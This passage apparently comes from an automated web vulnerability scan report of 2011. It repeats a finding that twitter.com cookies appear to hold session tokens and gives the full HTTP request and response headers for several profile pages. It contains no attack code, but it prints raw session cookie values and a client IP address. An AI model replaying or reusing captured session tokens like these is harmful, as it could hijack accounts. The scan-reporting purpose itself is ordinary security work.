X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Simply_b06 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:08 GMT Server: hi Status: 200 OK X-Transaction: 1296225007-69414-28796 ETag: "24db63c3097b33b2dc035ce49f9408ff" Last-Modified: Fri, 28 Jan 2011 14:30:08 GMT X-Runtime: 0.01086 Content-Type: text/html; charset=utf-8 Content-Length: 36440 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Simply_b06/status/29173383425949696 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:11 GMT Server: hi Status: 200 OK X-Transaction: 1296225011-27514-8303 ETag: "296e04489c61ead9a1933e485fa4bd22" Last-Modified: Fri, 28 Jan 2011 14:30:11 GMT X-Runtime: 0.07568 Content-Type: text/html; charset=utf-8 Content-Length: 13710 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vU2ltcGx5X2Iw%250ANi9zdGF0dXMvMjkxNzMzODM0MjU5NDk2OTY6DGNzcmZfaWQiJTVlM2JiNjY4%250ANWU3MmNhZmY3NzhhY2E3ODRiNDgwODdhOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--6d295a54df06def6a97568ac94ecdce0d4dc8a97; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Siobhan_Magnus HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:43 GMT Server: hi Status: 200 OK X-Transaction: 1296266023-80188-44224 ETag: "ccd41e2f423be9ffd34f56366edc99cd" Last-Modified: Sat, 29 Jan 2011 01:53:43 GMT X-Runtime: 0.00959 Content-Type: text/html; charset=utf-8 Content-Length: 49563 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /SlexAxton HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:45 GMT Server: hi Status: 200 OK X-Transaction: 1296225045-59196-5393 ETag: "507dff22fcced375038cdd9631235460" Last-Modified: Fri, 28 Jan 2011 14:30:45 GMT X-Runtime: 0.00969 Content-Type: text/html; charset=utf-8 Content-Length: 49927 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /StarWrit HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:18 GMT Server: hi Status: 200 OK X-Transaction: 1296265998-47037-26209 ETag: "98f418b00049e64d718057714c24d78d" Last-Modified: Sat, 29 Jan 2011 01:53:18 GMT X-Runtime: 0.01212 Content-Type: text/html; charset=utf-8 Content-Length: 69129 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Support HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:40 GMT Server: hi Status: 200 OK X-Transaction: 1296225040-79439-58935 ETag: "6f3f0f6d45a5a9149a4d122ad96ea840" Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT X-Runtime: 0.01685 Content-Type: text/html; charset=utf-8 Content-Length: 51752 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Svantasukhai HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:00 GMT Server: hi Status: 200 OK X-Transaction: 1296225060-92538-25020 ETag: "b5b7378e54ede43eec0f6508eb5d2185" Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT X-Runtime: 0.00759 Content-Type: text/html; charset=utf-8 Content-Length: 29522 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /THE_REAL_SHAQ HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:44:36 GMT Server: hi Status: 200 OK X-Transaction: 1296265476-22093-12798 ETag: "2292bad8ff862731407148084ee7d5a9" Last-Modified: Sat, 29 Jan 2011 01:44:36 GMT X-Runtime: 0.00794 Content-Type: text/html; charset=utf-8 Content-Length: 49010 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /TV38Boston HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:55 GMT Server: hi Status: 200 OK X-Transaction: 1296266035-61347-31781 ETag: "44a74d1afcf9bd83d65e21c61083ec35" Last-Modified: Sat, 29 Jan 2011 01:53:55 GMT X-Runtime: 0.01014 Content-Type: text/html; charset=utf-8 Content-Length: 19747 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /TechCrunch HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:40 GMT Server: hi Status: 200 OK X-Transaction: 1296225040-62897-59906 ETag: "d9c3c5e13ec1f2f0ecf37be4ab550c0a" Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT X-Runtime: 0.00806 Content-Type: text/html; charset=utf-8 Content-Length: 54066 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /TheKateBosworth HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:50:33 GMT Server: hi Status: 200 OK X-Transaction: 1296265833-80143-41969 ETag: "2e949d88eb257784b5bf1e7f6b09ebc5" Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT X-Runtime: 0.01545 Content-Type: text/html; charset=utf-8 Content-Length: 27140 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
